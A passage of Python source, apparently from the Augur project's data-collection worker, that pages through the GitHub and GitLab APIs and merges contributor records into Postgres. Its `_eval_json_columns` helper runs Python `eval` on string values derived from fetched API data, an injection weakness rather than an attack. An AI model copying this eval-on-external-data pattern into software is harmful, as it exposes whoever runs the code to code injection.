'gh_site_admin': contributor[f'{prefix}site_admin'],
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
} for contributor in source_cntrb_insert if contributor[f'{prefix}login']
]
self.bulk_insert(self.contributors_table, cntrb_insert)
# Query db for inserted cntrb pkeys and add to shallow level of data
# Query
cntrb_pk_name = list(self.contributors_table.primary_key)[0].name
session = s.orm.Session(self.db)
inserted_pks = pd.DataFrame(
session.query(
self.contributors_table.c[cntrb_pk_name], self.contributors_table.c.cntrb_login,
self.contributors_table.c.gh_node_id
).distinct(self.contributors_table.c.cntrb_login).order_by(
self.contributors_table.c.cntrb_login, self.contributors_table.c[cntrb_pk_name]
).all(), columns=[cntrb_pk_name, 'cntrb_login', 'gh_node_id']
).to_dict(orient='records')
session.close()
# Prepare for merge
source_columns = sorted(list(source_df.columns))
necessary_columns = sorted(list(set(source_columns + cntrb_action_map['insert']['source'])))
(source_table, inserted_pks_table), metadata, session = self._setup_postgres_merge(
[
expanded_source_df[necessary_columns].to_dict(orient='records'),
inserted_pks
], sort=True
)
final_columns = [cntrb_pk_name] + sorted(list(set(necessary_columns)))
# Merge
source_pk = pd.DataFrame(
session.query(
inserted_pks_table.c.cntrb_id, source_table
).join(
source_table,
eval(
' and '.join(
[
(
f"inserted_pks_table.c['{table_column}'] "
f"== source_table.c['{source_column}']"
) for table_column, source_column in zip(
cntrb_action_map['insert']['augur'],
cntrb_action_map['insert']['source']
)
]
)
)
).all(), columns=final_columns
)
# Cleanup merge
source_pk = self._eval_json_columns(source_pk)
self._close_postgres_merge(metadata, session)
self.logger.info(
"Contributor id enrichment successful, result has "
f"{len(source_pk)} data points.\n"
)
return source_pk.to_dict(orient='records')
def enrich_data_primary_keys(
self, source_data, table, gh_merge_fields, augur_merge_fields, in_memory=False
):
self.logger.info("Preparing to enrich data.\n")
if len(source_data) == 0:
self.logger.info("There is no source data to enrich.\n")
return source_data
source_df = self._add_nested_columns(pd.DataFrame(source_data), gh_merge_fields)
if not in_memory:
source_pk_columns = list(source_df.columns)
source_pk_columns.insert(0, list(table.primary_key)[0].name)
(source_table, ), metadata, session = self._setup_postgres_merge(
# [self._get_data_set_columns(source_data, gh_merge_fields)]
[source_df.to_dict(orient='records')]
)
source_pk = pd.DataFrame(
# eval(
# "session.query("
# + ", ".join(
# [
# f"table.c['{column}']" for column in [list(table.primary_key)[0].name]
# + augur_merge_fields
# ]
# )
# + ")"
# )
session.query(
table.c[list(table.primary_key)[0].name],
source_table
# eval(
# f"table.c['{list(table.primary_key)[0].name}'], "
# + ", ".join(
# [
# f"source_table.c['{column}']" for column in source_pk_columns
# ]
# )
# )
).join(
source_table,
eval(
' and '.join(
[
f"table.c['{table_column}'] == source_table.c['{source_column}']"
for table_column, source_column in zip(
augur_merge_fields, gh_merge_fields
)
]
)
)
).all(), columns=source_pk_columns # gh_merge_fields
)
source_pk = self._eval_json_columns(source_pk)
# source_pk, source_df = self.sync_df_types(
# source_pk, source_df, gh_merge_fields, gh_merge_fields
# )
# source_pk = source_pk.merge(source_df, how='inner', on=gh_merge_fields)
self.logger.info("source_pk calculated successfully")
self._close_postgres_merge(metadata, session)
self.logger.info("Done")
else:
# s_tuple = s.tuple_([table.c[field] for field in augur_merge_fields])
# s_tuple.__dict__['clauses'] = s_tuple.__dict__['clauses'][0].effective_value
# s_tuple.__dict__['_type_tuple'] = []
# for field in augur_merge_fields:
# s_tuple.__dict__['_type_tuple'].append(table.c[field].__dict__['type'])
# try:
# primary_keys = self.db.execute(s.sql.select(
# [table.c[field] for field in augur_merge_fields] + [table.c[list(table.primary_key)[0].name]]
# ).where(
# s_tuple.in_(
# list(source_df[gh_merge_fields].itertuples(index=False))
# ))).fetchall()
# except psycopg2.errors.StatementTooComplex as e:
self.logger.info("Retrieve pk statement too complex, querying all instead " +
"and performing partitioned merge.\n")
all_primary_keys = self.db.execute(s.sql.select(
[table.c[field] for field in augur_merge_fields] + [table.c[list(table.primary_key)[0].name]]
)).fetchall()
self.logger.info("Queried all")
all_primary_keys_df = pd.DataFrame(all_primary_keys,
columns=augur_merge_fields + [list(table.primary_key)[0].name])
self.logger.info("Converted to df")
source_df, all_primary_keys_df = self.sync_df_types(source_df, all_primary_keys_df,
gh_merge_fields, augur_merge_fields)
self.logger.info("Synced df types")
partitions = math.ceil(len(source_df) / 600)#1000)
attempts = 0
while attempts < 50:
try:
source_pk = pd.DataFrame()
self.logger.info(f"Trying {partitions} partitions of new data, {len(all_primary_keys_df)} " +
"pk data points to enrich\n")
for sub_df in numpy.array_split(source_df, partitions):
self.logger.info(f"Trying a partition, len {len(sub_df)}\n")
source_pk = pd.concat([ source_pk, sub_df.merge(all_primary_keys_df, suffixes=('','_table'),
how='inner', left_on=gh_merge_fields, right_on=augur_merge_fields) ])
self.logger.info(f"source_pk merge: {len(sub_df)} worked\n")
break
except MemoryError as e:
self.logger.info(f"new_data ({sub_df.shape}) is too large to allocate memory for " +
f"source_pk df merge.\nMemoryError: {e}\nTrying again with {partitions + 1} partitions...\n")
partitions += 1
attempts += 1
# self.logger.info(f"End attempt # {attempts}\n")
if attempts >= 50:
self.logger.info("Max source_pk merge attempts exceeded, cannot perform " +
"updates on this repo.\n")
else:
self.logger.info(f"Data enrichment successful, length: {len(source_pk)}\n")
# all_primary_keys_df.to_json(path_or_buf='all_primary_keys_df.json', orient='records')
# all_primary_keys_dask_df = dd.from_pandas(all_primary_keys_df, chunksize=1000)
# source_dask_df = dd.from_pandas(source_df, chunksize=1000)
# result = json.loads(source_dask_df.merge(all_primary_keys_dask_df, suffixes=('','_table'),
# how='inner', left_on=gh_merge_fields, right_on=augur_merge_fields).compute(
# ).to_json(default_handler=str, orient='records'))
return source_pk.to_dict(orient='records')
# if len(primary_keys) > 0:
# primary_keys_df = pd.DataFrame(primary_keys,
# columns=augur_merge_fields + [list(table.primary_key)[0].name])
# else:
# self.logger.info("There are no inserted primary keys to enrich the source data with.\n")
# return []
# source_df, primary_keys_df = self.sync_df_types(source_df, primary_keys_df,
# gh_merge_fields, augur_merge_fields)
# source_df = dd.from_pandas(source_df, chunksize=1000)
# primary_keys_df = dd.from_pandas(primary_keys_df, chunksize=1000)
# result = json.loads(source_df.merge(primary_keys_df, suffixes=('','_table'),
# how='inner', left_on=gh_merge_fields, right_on=augur_merge_fields).compute().to_json(
# default_handler=str, orient='records'))
# self.logger.info("Data enrichment successful.\n")
# return result
def multi_thread_urls(self, all_urls, max_attempts=5, platform='github'):
"""
:param all_urls: list of tuples
"""
if not len(all_urls):
self.logger.info("No urls to multithread, returning blank list.\n")
return []
def load_url(url, extra_data={}):
try:
html = requests.get(url, stream=True, headers=self.headers)
return html, extra_data
except requests.exceptions.RequestException as e:
self.logger.info(e, url)
self.logger.info("Beginning to multithread API endpoints.")
start = time.time()
all_data = []
valid_url_count = len(all_urls)
partitions = math.ceil(len(all_urls) / 600)
self.logger.info(f"{len(all_urls)} urls to process. Trying {partitions} partitions. " +
f"Using {max(multiprocessing.cpu_count()//8, 1)} threads.")
for urls in numpy.array_split(all_urls, partitions):
attempts = 0
self.logger.info(f"Total data points collected so far: {len(all_data)}")
while len(urls) > 0 and attempts < max_attempts:
with concurrent.futures.ThreadPoolExecutor(
max_workers=max(multiprocessing.cpu_count()//8, 1)
) as executor:
# Start the load operations and mark each future with its URL
future_to_url = {executor.submit(load_url, *url): url for url in urls}
self.logger.info("Multithreaded urls and returned status codes:")
count = 0
for future in concurrent.futures.as_completed(future_to_url):
if count % 100 == 0:
self.logger.info(
f"Processed {len(all_data)} / {valid_url_count} urls. "
f"{len(urls)} remaining in this partition."
)
count += 1
url = future_to_url[future]
try:
response, extra_data = future.result()
if response.status_code != 200:
self.logger.info(
f"Url: {url[0]} ; Status code: {response.status_code}"
)
if response.status_code == 403 or response.status_code == 401: # 403 is rate limit, 404 is not found, 401 is bad credentials
self.update_rate_limit(response, platform=platform)
continue
elif response.status_code == 200:
try:
page_data = response.json()
except:
page_data = json.loads(json.dumps(response.text))
page_data = [{**data, **extra_data} for data in page_data]
all_data += page_data
if 'last' in response.links and "&page=" not in url[0]:
urls += [
(url[0] + f"&page={page}", extra_data) for page in range(
2, int(response.links['last']['url'].split('=')[-1]) + 1
)
]
urls = numpy.delete(urls, numpy.where(urls == url), axis=0)
elif response.status_code == 404:
urls = numpy.delete(urls, numpy.where(urls == url), axis=0)
self.logger.info(f"Not found url: {url}\n")
else:
self.logger.info(
f"Unhandled response code: {response.status_code} {url}\n"
)
except Exception as e:
self.logger.info(
f"{url} generated an exception: {traceback.format_exc()}\n"
)
attempts += 1
self.logger.info(
f"Processed {valid_url_count} urls and got {len(all_data)} data points "
f"in {time.time() - start} seconds thanks to multithreading!\n"
)
return all_data
def _eval_json_columns(self, df):
if not len(df):
return df
for column in df.columns:
first_valid_value = df.fillna(method='bfill').iloc[0][column]
if isinstance(first_valid_value, str):
if (
first_valid_value[0] == '{' and first_valid_value[-1] == '}'
or first_valid_value[0] == '[' and first_valid_value[-1] == ']'
):
df[column] = df[column].fillna("'null_placeholder'").apply(eval).replace(
"null_placeholder", numpy.nan
).where(df[column].notna(), lambda x: [{}])
return df
def new_organize_needed_data(
self, new_data, augur_table=None, where_clause=True, action_map={}
):
self.logger.info(f"Beginning to organize needed data from {len(new_data)} data points...")
if len(new_data) == 0:
return [], []
new_data_columns = pd.DataFrame(new_data).columns
# # new_data_columns = copy.deepcopy(action_map['insert']['source'])
# table_value_columns = copy.deepcopy(action_map['insert']['augur'])
#
# if 'update' in action_map:
# # new_data_columns += action_map['update']['source']
# table_value_columns += action_map['update']['augur']
(new_data_table, ), metadata, session = self._setup_postgres_merge(
[
new_data
# self._get_data_set_columns(new_data, new_data_columns)
]
)
need_insertion = pd.DataFrame(
session.query(new_data_table).join(
augur_table,
eval(
' and '.join(
[
f"augur_table.c['{table_column}'] == new_data_table.c['{source_column}']"
for table_column, source_column in zip(
action_map['insert']['augur'], action_map['insert']['source']
)
]
)
), isouter=True
).filter(
augur_table.c[action_map['insert']['augur'][0]] == None
).all(), columns=new_data_columns # table_value_columns
)
need_insertion = self._eval_json_columns(need_insertion)
# new_data_df = pd.DataFrame(new_data)
# need_insertion, new_data_df = self.sync_df_types(
# need_insertion, new_data_df, table_value_columns, new_data_columns
# )
# need_insertion = need_insertion.merge(
# new_data_df, how='inner', left_on=table_value_columns, right_on=new_data_columns
# )
self.logger.info("need_insertion calculated successfully")
need_updates = pd.DataFrame(columns=new_data_columns)
if 'update' in action_map:
need_updates = pd.DataFrame(
session.query(new_data_table).join(
augur_table,
s.and_(
eval(
' and '.join(
[
(
f"augur_table.c.{table_column} "
f"== new_data_table.c.{source_column}"
) for table_column, source_column in zip(
action_map['insert']['augur'],
action_map['insert']['source']
)
]
)
),
eval(
' and '.join(
[
(
f"augur_table.c.{table_column} "
f"!= new_data_table.c.{source_column}"
) for table_column, source_column in zip(
action_map['update']['augur'],
action_map['update']['source']
)
]
)
)
)
).all(), columns=new_data_columns
)
self.logger.info("need_updates calculated successfully")
self._close_postgres_merge(metadata, session)
self.logger.info(
f"Table needs {len(need_insertion)} insertions and "
f"{len(need_updates)} updates.\n"
)
return need_insertion.to_dict('records'), need_updates.to_dict('records')
def new_paginate_endpoint(
self, url, action_map={}, table=None, where_clause=True, platform='github'
):
page_number = 1
multiple_pages = False
need_insertion = []
need_update = []
all_data = []
forward_pagination = True
backwards_activation = False
last_page_number = -1
while True:
# Multiple attempts to hit endpoint
num_attempts = 0
success = False
while num_attempts < 10:
self.logger.info("hitting an endpiont")
# f"Hitting endpoint: ...\n"
# f"{url.format(page_number)} on page number. \n")
try:
response = requests.get(url=url.format(page_number), headers=self.headers)
except TimeoutError as e:
self.logger.info("Request timed out. Sleeping 10 seconds and trying again...\n")
time.sleep(10)
continue
self.update_rate_limit(response, platform=platform)
try:
page_data = response.json()
except:
page_data = json.loads(json.dumps(response.text))
if type(page_data) == list:
success = True
break
elif type(page_data) == dict:
self.logger.info("Request returned a dict: {}\n".format(page_data))
if page_data['message'] == "Not Found":
self.logger.warning(
"Github repo was not found or does not exist for endpoint: "
f"{url.format(page_number)}\n"
)
break
if "You have triggered an abuse detection mechanism." in page_data['message']:
num_attempts -= 1
self.update_rate_limit(response, temporarily_disable=True,platform=platform)
if page_data['message'] == "Bad credentials":
self.update_rate_limit(response, bad_credentials=True, platform=platform)
elif type(page_data) == str:
self.logger.info(f"Warning! page_data was string: {page_data}\n")
if "<!DOCTYPE html>" in page_data:
self.logger.info("HTML was returned, trying again...\n")
elif len(page_data) == 0:
self.logger.warning("Empty string, trying again...\n")
else:
try:
page_data = json.loads(page_data)
success = True
break
except:
pass
num_attempts += 1
if not success:
break
# Success
# Determine if continued pagination is needed
if len(page_data) == 0:
self.logger.info("Response was empty, breaking from pagination.\n")
break
all_data += page_data
if not forward_pagination:
# Checking contents of requests with what we already have in the db
page_insertions, page_updates = self.new_organize_needed_data(
page_data, augur_table=table, action_map=action_map
)
# Reached a page where we already have all tuples
if len(need_insertion) == 0 and len(need_update) == 0 and \
backwards_activation:
self.logger.info(
"No more pages with unknown tuples, breaking from pagination.\n"
)
break
need_insertion += page_insertions
need_update += page_updates
# Find last page so we can decrement from there
if 'last' in response.links and last_page_number == -1:
if platform == 'github':
last_page_number = int(response.links['last']['url'][-6:].split('=')[1])
elif platform == 'gitlab':
last_page_number = int(response.links['last']['url'].split('&')[2].split('=')[1])
if not forward_pagination and not backwards_activation:
page_number = last_page_number
backwards_activation = True
self.logger.info("Analyzation of page {} of {} complete\n".format(page_number,
int(last_page_number) if last_page_number != -1 else "*last page not known*"))
if (page_number <= 1 and not forward_pagination) or \
(page_number >= last_page_number and forward_pagination):
self.logger.info("No more pages to check, breaking from pagination.\n")
break
page_number = page_number + 1 if forward_pagination else page_number - 1
if forward_pagination:
need_insertion, need_update = self.new_organize_needed_data(
all_data, augur_table=table, action_map=action_map
)
return {
'insert': need_insertion,
'update': need_update,
'all': all_data
}
def paginate_endpoint(
self, url, action_map={}, table=None, where_clause=True, platform='github', in_memory=True
):
table_values = self.db.execute(
s.sql.select(self.get_relevant_columns(table, action_map)).where(where_clause)
).fetchall()
page_number = 1
multiple_pages = False
need_insertion = []
need_update = []
all_data = []
forward_pagination = True
backwards_activation = False
last_page_number = -1
while True:
# Multiple attempts to hit endpoint
num_attempts = 0
success = False
while num_attempts < 10:
self.logger.info(f"Hitting endpoint: {url.format(page_number)}...\n")
try:
response = requests.get(url=url.format(page_number), headers=self.headers)
except TimeoutError as e:
self.logger.info("Request timed out. Sleeping 10 seconds and trying again...\n")
time.sleep(10)
continue
self.update_rate_limit(response, platform=platform)
try:
page_data = response.json()
except:
page_data = json.loads(json.dumps(response.text))
if type(page_data) == list:
success = True
break
elif type(page_data) == dict:
self.logger.info("Request returned a dict: {}\n".format(page_data))
if page_data['message'] == "Not Found":
self.logger.warning(
"Github repo was not found or does not exist for endpoint: "
f"{url.format(page_number)}\n"
)
break
if "You have triggered an abuse detection mechanism." in page_data['message']:
num_attempts -= 1
self.update_rate_limit(response, temporarily_disable=True,platform=platform)
if page_data['message'] == "Bad credentials":
self.update_rate_limit(response, bad_credentials=True, platform=platform)
elif type(page_data) == str:
self.logger.info(f"Warning! page_data was string: {page_data}\n")
if "<!DOCTYPE html>" in page_data:
self.logger.info("HTML was returned, trying again...\n")
elif len(page_data) == 0:
self.logger.warning("Empty string, trying again...\n")
else:
try:
page_data = json.loads(page_data)
success = True
break
except:
pass
num_attempts += 1
if not success:
break
# Success
# Determine if continued pagination is needed
if len(page_data) == 0:
self.logger.info("Response was empty, breaking from pagination.\n")
break
all_data += page_data
if not forward_pagination:
# Checking contents of requests with what we already have in the db
page_insertions, page_updates = self.organize_needed_data(
page_data, table_values, list(table.primary_key)[0].name,
action_map, in_memory=True
)
# Reached a page where we already have all tuples
if len(need_insertion) == 0 and len(need_update) == 0 and \
backwards_activation:
self.logger.info(
"No more pages with unknown tuples, breaking from pagination.\n"
)
break
need_insertion += page_insertions
need_update += page_updates
# Find last page so we can decrement from there
if 'last' in response.links and last_page_number == -1:
if platform == 'github':
last_page_number = int(response.links['last']['url'][-6:].split('=')[1])
elif platform == 'gitlab':
last_page_number = int(response.links['last']['url'].split('&')[2].split('=')[1])
if not forward_pagination and not backwards_activation:
page_number = last_page_number
backwards_activation = True
self.logger.info("Analyzation of page {} of {} complete\n".format(page_number,
int(last_page_number) if last_page_number != -1 else "*last page not known*"))
if (page_number <= 1 and not forward_pagination) or \
(page_number >= last_page_number and forward_pagination):
self.logger.info("No more pages to check, breaking from pagination.\n")
break
page_number = page_number + 1 if forward_pagination else page_number - 1
if forward_pagination:
need_insertion, need_update = self.organize_needed_data(
all_data, table_values, list(table.primary_key)[0].name, action_map,
in_memory=in_memory
)
return {
'insert': need_insertion,
'update': need_update,
'all': all_data
}
def paginate(self, url, duplicate_col_map, update_col_map, table, table_pkey, where_clause="", value_update_col_map={}, platform="github"):
""" DEPRECATED
Paginate either backwards or forwards (depending on the value of the worker's
finishing_task attribute) through all the GitHub or GitLab api endpoint pages.
:param url: String, the url of the API endpoint we are paginating through, expects
a curly brace string formatter within the string to format the Integer
representing the page number that is wanted to be returned
:param duplicate_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
duplicates (if source data value == value in existing database row, then this
element is a duplicate and would not need an insertion). Key is source data
column name, value is database field name. Example: {'id': 'gh_issue_id'}
:param update_col_map: Dictionary, maps the column names of the source data
to the field names in our database for columns that should be checked for
updates (if source data value != value in existing database row, then an
update is needed). Key is source data column name, value is database field name.
Example: {'id': 'gh_issue_id'}
:param table: String, the name of the table that holds the values to check for
duplicates/updates against
:param table_pkey: String, the field name of the primary key of the table in
the database that we are getting the values for to cross-reference to check
for duplicates.
:param where_clause: String, optional where clause to filter the values
that are queried when preparing the values that will be cross-referenced
for duplicates/updates
:param value_update_col_map: Dictionary, sometimes we add a new field to a table,
and we want to trigger an update of that row in the database even if all of the
data values are the same and would not need an update ordinarily. Checking for
a specific existing value in the database field allows us to do this. The key is the
name of the field in the database we are checking for a specific value to trigger
an update, the value is the value we are checking for equality to trigger an update.
Example: {'cntrb_id': None}
:return: List of dictionaries, all data points from the pages of the specified API endpoint
each with a 'flag' key-value pair representing the required action to take with that
data point (i.e. 'need_insertion', 'need_update', 'none')
"""
update_keys = list(update_col_map.keys()) if update_col_map else []
update_keys += list(value_update_col_map.keys()) if value_update_col_map else []
cols_to_query = list(duplicate_col_map.keys()) + update_keys + [table_pkey]
table_values = self.get_table_values(cols_to_query, [table], where_clause)
i = 1
multiple_pages = False
tuples = []
while True:
num_attempts = 0
success = False
while num_attempts < 3:
self.logger.info(f'Hitting endpoint: {url.format(i)}...\n')
r = requests.get(url=url.format(i), headers=self.headers)
self.update_rate_limit(r, platform=platform)
if 'last' not in r.links:
last_page = None
else:
if platform == "github":
last_page = r.links['last']['url'][-6:].split('=')[1]
elif platform == "gitlab":
last_page = r.links['last']['url'].split('&')[2].split("=")[1]
self.logger.info("Analyzing page {} of {}\n".format(i, int(last_page) + 1 if last_page is not None else '*last page not known*'))
try:
j = r.json()
except:
j = json.loads(json.dumps(r.text))
if type(j) != dict and type(j) != str:
success = True
break
elif type(j) == dict:
self.logger.info("Request returned a dict: {}\n".format(j))
if j['message'] == 'Not Found':
self.logger.warning("Github repo was not found or does not exist for endpoint: {}\n".format(url))
break
if j['message'] == 'You have triggered an abuse detection mechanism. Please wait a few minutes before you try again.':
num_attempts -= 1
self.logger.info("rate limit update code goes here")
self.update_rate_limit(r, temporarily_disable=True,platform=platform)
if j['message'] == 'Bad credentials':
self.logger.info("rate limit update code goes here")
self.update_rate_limit(r, bad_credentials=True, platform=platform)
elif type(j) == str:
self.logger.info(f'J was string: {j}\n')
if '<!DOCTYPE html>' in j:
self.logger.info('HTML was returned, trying again...\n')
elif len(j) == 0:
self.logger.warning('Empty string, trying again...\n')
else:
try:
j = json.loads(j)
success = True
break
except:
pass
num_attempts += 1
if not success:
break
# Find last page so we can decrement from there
if 'last' in r.links and not multiple_pages and not self.finishing_task:
if platform == "github":
param = r.links['last']['url'][-6:]
i = int(param.split('=')[1]) + 1
elif platform == "gitlab":
i = int(r.links['last']['url'].split('&')[2].split("=")[1]) + 1
self.logger.info("Multiple pages of request, last page is " + str(i - 1) + "\n")
multiple_pages = True
elif not multiple_pages and not self.finishing_task:
self.logger.info("Only 1 page of request\n")
elif self.finishing_task:
self.logger.info("Finishing a previous task, paginating forwards ..."
" excess rate limit requests will be made\n")
if len(j) == 0:
self.logger.info("Response was empty, breaking from pagination.\n")
break
# Checking contents of requests with what we already have in the db
j = self.assign_tuple_action(j, table_values, update_col_map, duplicate_col_map, table_pkey, value_update_col_map)
if not j:
self.logger.error("Assigning tuple action failed, moving to next page.\n")
i = i + 1 if self.finishing_task else i - 1
continue
try:
to_add = [obj for obj in j if obj not in tuples and (obj['flag'] != 'none')]
except Exception as e:
self.logger.error("Failure accessing data of page: {}. Moving to next page.\n".format(e))
i = i + 1 if self.finishing_task else i - 1
continue
if len(to_add) == 0 and multiple_pages and 'last' in r.links:
self.logger.info("{}".format(r.links['last']))
if platform == "github":
page_number = int(r.links['last']['url'][-6:].split('=')[1])
elif platform == "gitlab":
page_number = int(r.links['last']['url'].split('&')[2].split("=")[1])
if i - 1 != page_number:
self.logger.info("No more pages with unknown tuples, breaking from pagination.\n")
break
tuples += to_add
i = i + 1 if self.finishing_task else i - 1
# Since we already wouldve checked the first page... break
if (i == 1 and multiple_pages and not self.finishing_task) or i < 1 or len(j) == 0:
self.logger.info("No more pages to check, breaking from pagination.\n")
break
return tuples
def query_github_contributors(self, entry_info, repo_id):
""" Data collection function
Query the GitHub API for contributors
"""
self.logger.info(f"Querying contributors with given entry info: {entry_info}\n")
github_url = entry_info['given']['github_url'] if 'github_url' in entry_info['given'] else entry_info['given']['git_url']
# Extract owner/repo from the url for the endpoint
owner, name = self.get_owner_repo(github_url)
# Set the base of the url and place to hold contributors to insert
contributors_url = (
f"https://api.github.com/repos/{owner}/{name}/" +
"contributors?per_page=100&page={}"
)
# Get contributors that we already have stored
# Set our duplicate and update column map keys (something other than PK) to
# check dupicates/needed column updates with
table = 'contributors'
table_pkey = 'cntrb_id'
update_col_map = {'cntrb_email': 'email'}
duplicate_col_map = {'cntrb_login': 'login'}
#list to hold contributors needing insertion or update
contributors = self.paginate(contributors_url, duplicate_col_map, update_col_map, table, table_pkey)
self.logger.info("Count of contributors needing insertion: " + str(len(contributors)) + "\n")
for repo_contributor in contributors:
try:
# Need to hit this single contributor endpoint to get extra data including...
# `created at`
# i think that's it
cntrb_url = ("https://api.github.com/users/" + repo_contributor['login'])
self.logger.info("Hitting endpoint: " + cntrb_url + " ...\n")
r = requests.get(url=cntrb_url, headers=self.headers)
self.update_gh_rate_limit(r)
contributor = r.json()
company = None
location = None
email = None
if 'company' in contributor:
company = contributor['company']
if 'location' in contributor:
location = contributor['location']
if 'email' in contributor:
email = contributor['email']
canonical_email = contributor['email']
cntrb = {
"cntrb_login": contributor['login'],
"cntrb_created_at": contributor['created_at'],
"cntrb_email": email,
"cntrb_company": company,
"cntrb_location": location,
# "cntrb_type": , dont have a use for this as of now ... let it default to null
"cntrb_canonical": canonical_email,
"gh_user_id": contributor['id'],
"gh_login": contributor['login'],
"gh_url": contributor['url'],
"gh_html_url": contributor['html_url'],
"gh_node_id": contributor['node_id'],
"gh_avatar_url": contributor['avatar_url'],
"gh_gravatar_id": contributor['gravatar_id'],
"gh_followers_url": contributor['followers_url'],
"gh_following_url": contributor['following_url'],
"gh_gists_url": contributor['gists_url'],
"gh_starred_url": contributor['starred_url'],
"gh_subscriptions_url": contributor['subscriptions_url'],
"gh_organizations_url": contributor['organizations_url'],
"gh_repos_url": contributor['repos_url'],
"gh_events_url": contributor['events_url'],
"gh_received_events_url": contributor['received_events_url'],
"gh_type": contributor['type'],
"gh_site_admin": contributor['site_admin'],
"tool_source": self.tool_source,
"tool_version": self.tool_version,
"data_source": self.data_source
}
# Commit insertion to table
if repo_contributor['flag'] == 'need_update':
result = self.db.execute(self.contributors_table.update().where(
self.worker_history_table.c.cntrb_email==email).values(cntrb))
self.logger.info("Updated tuple in the contributors table with existing email: {}".format(email))
self.cntrb_id_inc = repo_contributor['pkey']
elif repo_contributor['flag'] == 'need_insertion':
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: {}".format(result.inserted_primary_key))
self.results_counter += 1
self.logger.info("Inserted contributor: " + contributor['login'] + "\n")
# Increment our global track of the cntrb id for the possibility of it being used as a FK
self.cntrb_id_inc = int(result.inserted_primary_key[0])
except Exception as e:
self.logger.error("Caught exception: {}".format(e))
self.logger.error("Cascading Contributor Anomalie from missing repo contributor data: {} ...\n".format(cntrb_url))
continue
def query_github_contributors_bulk(self, entry_info, repo_id):
""" Data collection function
Query the GitHub API for contributors
"""
self.logger.info(f"Querying contributors with given entry info: {entry_info}\n")
github_url = entry_info['given']['github_url'] if 'github_url' in entry_info['given'] else entry_info['given']['git_url']
owner, name = self.get_owner_repo(github_url)
contributors_url = (f"https://api.github.com/repos/{owner}/{name}/" +
"contributors?per_page=100&page={}")
action_map = {
'insert': {
'source': ['login'],
'augur': ['cntrb_login']
},
'update': {
'source': ['email'],
'augur': ['cntrb_email']
}
}
source_contributors = self.paginate_endpoint(contributors_url, action_map=action_map,
table=self.contributors_table)
contributors_insert = []
for repo_contributor in source_contributors['insert']:
# Need to hit this single contributor endpoint to get extra data
cntrb_url = (f"https://api.github.com/users/{repo_contributor['login']}")
self.logger.info(f"Hitting endpoint: {cntrb_url} ...\n")
r = requests.get(url=cntrb_url, headers=self.headers)
self.update_gh_rate_limit(r)
contributor = r.json()
contributors_insert.append({
'cntrb_login': contributor['login'],
'cntrb_created_at': contributor['created_at'],
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_canonical': contributor['email'] if 'email' in contributor else None,
'gh_user_id': contributor['id'],
'gh_login': contributor['login'],
'gh_url': contributor['url'],
'gh_html_url': contributor['html_url'],
'gh_node_id': contributor['node_id'],
'gh_avatar_url': contributor['avatar_url'],
'gh_gravatar_id': contributor['gravatar_id'],
'gh_followers_url': contributor['followers_url'],
'gh_following_url': contributor['following_url'],
'gh_gists_url': contributor['gists_url'],
'gh_starred_url': contributor['starred_url'],
'gh_subscriptions_url': contributor['subscriptions_url'],
'gh_organizations_url': contributor['organizations_url'],
'gh_repos_url': contributor['repos_url'],
'gh_events_url': contributor['events_url'],
'gh_received_events_url': contributor['received_events_url'],
'gh_type': contributor['type'],
'gh_site_admin': contributor['site_admin'],
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
})
contributors_insert_result, contributors_update_result = self.bulk_insert(self.contributors_table,
update=source_contributors['update'], unique_columns=action_map['insert']['augur'],
insert=contributors_insert, update_columns=action_map['update']['augur'])
def query_github_contributors_fast(self, entry_info, repo_id):
""" Data collection function
Query the GitHub API for contributors
"""
self.logger.info(f"Querying contributors with given entry info: {entry_info}")
github_url = (
entry_info['given']['github_url'] if 'github_url' in entry_info['given']
else entry_info['given']['git_url']
)
contributors_url = (
f"https://api.github.com/repos/{self.owner}/{self.name}/"
"contributors?per_page=100&page={}"
)
action_map = {
'insert': {
'source': ['login'],
'augur': ['cntrb_login']
},
'update': {
'source': ['email'],
'augur': ['cntrb_email']
}
}
source_contributors = self.paginate_endpoint(
contributors_url, action_map=action_map, table=self.contributors_table
)
contributors_insert = [
{
'cntrb_login': contributor['login'],
'cntrb_created_at': (
contributor['created_at'] if 'created_at' in contributor else None
),
'cntrb_email': contributor['email'] if 'email' in contributor else None,
'cntrb_company': contributor['company'] if 'company' in contributor else None,
'cntrb_location': contributor['location'] if 'location' in contributor else None,
'cntrb_canonical': contributor['email'] if 'email' in contributor else None,
'gh_user_id': contributor['id'],
'gh_login': contributor['login'],
'gh_url': contributor['url'],
'gh_html_url': contributor['html_url'],
'gh_node_id': contributor['node_id'],
'gh_avatar_url': contributor['avatar_url'],
'gh_gravatar_id': contributor['gravatar_id'],
'gh_followers_url': contributor['followers_url'],
'gh_following_url': contributor['following_url'],
'gh_gists_url': contributor['gists_url'],
'gh_starred_url': contributor['starred_url'],
'gh_subscriptions_url': contributor['subscriptions_url'],
'gh_organizations_url': contributor['organizations_url'],
'gh_repos_url': contributor['repos_url'],
'gh_events_url': contributor['events_url'],
'gh_received_events_url': contributor['received_events_url'],
'gh_type': contributor['type'],
'gh_site_admin': contributor['site_admin'],
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
} for contributor in source_contributors['insert']
]
self.bulk_insert(
self.contributors_table, update=source_contributors['update'],
unique_columns=action_map['insert']['augur'],
insert=contributors_insert, update_columns=action_map['update']['augur']
)
def query_gitlab_contribtutors(self, entry_info, repo_id):
gitlab_url = (
entry_info['given']['gitlab_url'] if 'gitlab_url' in entry_info['given']
else entry_info['given']['git_url']
)
self.logger.info("Querying contributors with given entry info: " + str(entry_info) + "\n")
path = urlparse(gitlab_url)
split = path[2].split('/')
owner = split[1]
name = split[2]
# Handles git url case by removing the extension
if ".git" in name:
name = name[:-4]
url_encoded_format = quote(owner + '/' + name, safe='')
table = 'contributors'
table_pkey = 'cntrb_id'
### %TODO Remap this to a GitLab Contributor ID like the GitHub Worker.
### Following Gabe's rework of the contributor worker.
update_col_map = {'cntrb_email': 'email'}
duplicate_col_map = {'cntrb_login': 'email'}
# list to hold contributors needing insertion or update
